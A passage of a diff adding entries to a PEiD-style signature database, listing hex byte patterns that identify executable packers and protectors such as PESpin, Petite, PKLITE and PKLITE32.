+signature = 5D 8B C5 81 ED B2 2C 40 00 2B 85 94 3E 40 00 2D 71 02 00 00 89 85 98 3E 40 00 0F B6 B5 9C 3E 40 00 8B FD
+ep_only = true
+
+[PEQuake 0.06-> forgat]
+signature = E8 A5 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? ?? 00 5B ?? ?? 00 6E ?? ?? 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 ?? ?? 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00
+ep_only = false
+
+[PEQuake v0.06 by fORGAT]
+signature = E8 A5 00 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 3D ?? 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? 00 00 5B ?? 00 00 6E ?? 00 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64
+ep_only = false
+
+[PerlApp 6.0.2 -> ActiveState]
+signature = 68 2C EA 40 00 FF D3 83 C4 0C 85 C0 0F 85 CD 00 00 00 6A 09 57 68 20 EA 40 00 FF D3 83 C4 0C 85 C0 75 12 8D 47 09 50 FF 15 1C D1 40 00 59 A3 B8 07 41 00 EB 55 6A 08 57 68 14 EA 40 00 FF D3 83 C4 0C 85 C0 75 11 8D 47 08 50 FF 15 1C D1 40 00 59 89 44 24 10 EB 33 6A 09 57 68 08 EA 40 00 FF D3 83 C4 0C 85 C0 74 22 6A 08 57 68 FC E9 40 00 FF D3 83 C4 0C 85 C0 74 11 6A 0B 57 68 F0 E9 40 00 FF D3 83 C4 0C 85 C0 75 55
+ep_only = false
+
+[PerlApp 6.0.2 -> ActiveState]
+signature = 68 9C E1 40 00 FF 15 A4 D0 40 00 85 C0 59 74 0F 50 FF 15 1C D1 40 00 85 C0 59 89 45 FC 75 62 6A 00 8D 45 F8 FF 75 0C F6 45 14 01 50 8D 45 14 50 E8 9B 01 00 00 83 C4 10 85 C0 0F 84 E9 00 00 00 8B 45 F8 83 C0 14 50 FF D6 85 C0 59 89 45 FC 75 0E FF 75 14 FF 15 78 D0 40 00 E9 C9 00 00 00 68 8C E1 40 00 FF 75 14 50
+ep_only = false
+
+[PESHiELD v0.1b MTE]
+signature = E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B9 1B 01 ?? ?? D1
+ep_only = true
+
+[PESHiELD v0.2 / v0.2b / v0.2b2]
+signature = 60 E8 ?? ?? ?? ?? 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04
+ep_only = true
+
+[PESHiELD v0.251]
+signature = 5D 83 ED 06 EB 02 EA 04 8D
+ep_only = true
+
+[PEShit]
+signature = B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF
+ep_only = true
+
+[PESpin v0.1 -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PESpin v0.1 -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PESpin V0.3 -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00
+ep_only = true
+
+[PESpin v0.7 -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PESpin V0.71 -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E
+ep_only = true
+
+[PESpin V1.1 -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E
+ep_only = true
+
+[PESpin v1.1 -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PESPin v1.3 -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PESpin v1.304 -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PESpin v1.3beta -> Cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF
+ep_only = true
+
+[PEStubOEP v1.x]
+signature = 40 48 BE 00 ?? ?? 00 40 48 60 33 C0 B8 ?? ?? ?? 00 FF E0 C3 C3
+ep_only = false
+
+[PeStubOEP v1.x]
+signature = 90 33 C9 33 D2 B8 ?? ?? ?? 00 B9 FF
+ep_only = false
+
+[PeStubOEP v1.x]
+signature = E8 05 00 00 00 33 C0 40 48 C3 E8 05
+ep_only = false
+
+[Petite 1.2]
+signature = 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00
+ep_only = true
+
+[Petite 1.2 -> (c)1998 Ian Luck]
+signature = 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02
+ep_only = true
+
+[Petite 1.3]
+signature = 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1
+ep_only = false
+
+[Petite 1.3 -> (c)1998 Ian Luck]
+signature = ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03
+ep_only = true
+
+[Petite 1.4]
+signature = 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC
+ep_only = false
+
+[Petite 1.4 -> (c)1998-99 Ian Luck]
+signature = ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6
+ep_only = true
+
+[Petite 2.1]
+signature = 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8
+ep_only = false
+
+[Petite 2.2 -> (c)1998-99 Ian Luck]
+signature = ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66
+ep_only = true
+
+[PEtite v1.2]
+signature = 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08
+ep_only = true
+
+[PEtite v1.3]
+signature = ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42
+ep_only = true
+
+[PEtite v1.4]
+signature = 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC
+ep_only = true
+
+[PEtite v1.4]
+signature = ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC
+ep_only = true
+
+[Petite v1.4]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00
+ep_only = true
+
+[PEtite v2.0]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68
+ep_only = true
+
+[PEtite v2.1]
+signature = B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[Petite v2.1 (1)]
+signature = B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[Petite v2.1 (2)]
+signature = B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEtite v2.2]
+signature = B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[Petite v?.? (after v1.4)]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83
+ep_only = true
+
+[PEtite vx.x]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PeX 0.99 -> bart^CrackPl]
+signature = E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = true
+
+[PEX v0.99]
+signature = 60 E8 01 ?? ?? ?? ?? 83 C4 04 E8 01 ?? ?? ?? ?? 5D 81
+ep_only = true
+
+[PeX v0.99 (Eng) -> bart/CrackPl]
+signature = E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = true
+
+[PEZip v1.0 by BaGIE]
+signature = D9 D0 F8 74 02 23 DB F5 F5 50 51 52 53 8D 44 24 10 50 55 56 57 D9 D0 22 C9 C1 F7 A0 55 66 C1 C8 B0 5D 81 E6 FF FF FF FF F8 77 07 52 76 03 72 01 90 5A C1 E0 60 90 BD 1F 01 00 00 87 E8 E2 07 E3 05 17 5D 47 E4 42 41 7F 06 50 66 83 EE 00 58 25 FF FF FF FF 51
+ep_only = false
+
+[PE_Admin 1.0 (EncryptPE 1.2003.5.18 Sold) -> Flying Cat]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = true
+
+[PE_Admin 1.0 (EncryptPE 1.2003.5.18 Sold) -> Flying Cat]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00
+ep_only = true
+
+[PGMPACK v0.13]
+signature = FA 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3
+ep_only = true
+
+[PGMPACK v0.14]
+signature = 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3
+ep_only = true
+
+[Pi Cryptor 1.0 - by Scofield]
+signature = 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0
+ep_only = false
+
+[Pi Cryptor 1.0 - by Scofield]
+signature = 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 5A 59 59 64 89 10 68 3D 1F 06 00 8D 45 EC E8 C3 F6 FF FF C3
+ep_only = true
+
+[Pi Cryptor 1.0 - by Scofield]
+signature = 89 55 F8 BB 01 00 00 00 8A 04 1F 24 0F 8B 55 FC 8A 14 32 80 E2 0F 32 C2 8A 14 1F 80 E2 F0 02 D0 88 14 1F 46 8D 45 F4 8B 55 FC E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B F0 7E 05 BE 01 00 00 00 43 FF 4D F8 75 C2 ?? ?? ?? ?? 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? C3 E9
+ep_only = false
+
+[PKLITE v1.00, v1.03]
+signature = B8 ?? ?? BA ?? ?? 8C DB 03 D8 3B
+ep_only = true
+
+[PKLITE v1.00c (1)]
+signature = 2E 8C 1E ?? ?? 8B 1E ?? ?? 8C DA 81 C2 ?? ?? 3B DA 72 ?? 81 EB ?? ?? 83 EB ?? FA 8E D3 BC ?? ?? FB FD BE ?? ?? 8B FE
+ep_only = true
+
+[PKLITE v1.00c (2)]
+signature = BA ?? ?? A1 ?? ?? 2D ?? ?? 8C CB 81 C3 ?? ?? 3B C3 77 ?? 05 ?? ?? 3B C3 77 ?? B4 09 BA ?? ?? CD 21 CD 20 90
+ep_only = true
+
+[PKLITE v1.12, v1.15, v1.20 (1)]
+signature = B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 73 ?? 2D ?? ?? FA 8E D0 FB 2D ?? ?? 8E C0 50 B9 ?? ?? 33 FF 57 BE ?? ?? FC F3 A5 CB B4 09 BA ?? ?? CD 21 CD 20
+ep_only = true
+
+[PKLITE v1.12, v1.15, v1.20 (2)]
+signature = B8 ?? ?? BA ?? ?? 3B C4 73
+ep_only = true
+
+[PKLITE v1.14, v1.15, v1.20 (3)]
+signature = B8 ?? ?? BA ?? ?? 05 ?? ?? 3B ?? ?? ?? 72 ?? B4 09 BA ?? 01 CD 21 CD 20 4E 6F
+ep_only = true
+
+[PKLITE v1.14, v1.20]
+signature = B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 20
+ep_only = true
+
+[PKLITE v1.20]
+signature = B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 B4 4C CD 21
+ep_only = true
+
+[PKLITE v1.50 (1)]
+signature = 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 ?? BA ?? ?? CD 21 B8 ?? ?? CD 21
+ep_only = true
+
+[PKLITE v1.50 (Device driver compression)]
+signature = B4 09 BA 14 01 CD 21 B8 00 4C CD 21 F8 9C 50 53 51 52 56 57 55 1E 06 BB
+ep_only = true
+
+[PKLITE v2.00b]
+signature = 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 2D ?? ?? 8E D0 51 2D ?? ?? 8E C0 50 B9
+ep_only = true
+
+[PKLITE v2.00b [extra]]
+signature = 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EA ?? ?? ?? ?? F3 A5 C3 59 2D ?? ?? 8E D0 51 2D ?? ?? 50 80
+ep_only = true
+
+[PKLITE v2.00c]
+signature = 50 B8 ?? ?? BA ?? ?? 3B C4 73 ?? 8B C4 2D ?? ?? 25 ?? ?? 8B F8 B9 ?? ?? BE ?? ?? FC
+ep_only = true
+
+[PKLITE32 1.1]
+signature = 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31
+ep_only = true
+
+[PKLITE32 1.1 -> PKWARE Inc.]
+signature = 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 00 00 00 00 E8 ?? ?? ?? ?? E9
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 55 8B EC A1 ?? ?? ?? ?? 85 C0 74 09 B8 01 00 00 00 5D C2 0C 00 8B 45 0C 57 56 53 8B 5D 10
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 55 8B EC A1 ?? ?? ?? ?? 85 C0 74 09 B8 01 ?? ?? ?? 5D C2 0C ?? 8B 45 0C 57 56 53 8B 5D 10
+ep_only = false
+
+[PKLITE32 v1.1]
+signature = 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 00 00 00 00 E8
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 0C 50
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31
+ep_only = true
+
+[Pksmart 1.0b]
+signature = BA ?? ?? 8C C8 8B C8 03 C2 81 ?? ?? ?? 51 B9 ?? ?? 51 1E 8C D3
+ep_only = true
+
+[PKTINY v1.0 with TINYPROG v3.8]
+signature = 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83
+ep_only = true
+
+[PKZIP-SFX v1.1 1989-90]
+signature = FC 2E 8C 0E ?? ?? A1 ?? ?? 8C CB 81 C3 ?? ?? 3B C3 72 ?? 2D ?? ?? 2D ?? ?? FA BC ?? ?? 8E D0 FB
+ep_only = true
+
+[PLINK86 1984, 1985]
+signature = FA 8C C7 8C D6 8B CC BA ?? ?? 8E C2 26
+ep_only = true
+
+[PluginToExe v1.00 -> BoB / BobSoft]
+signature = E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00
+ep_only = true
+
+[PluginToExe v1.01 -> BoB / BobSoft]
+signature = E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00
+ep_only = true
+
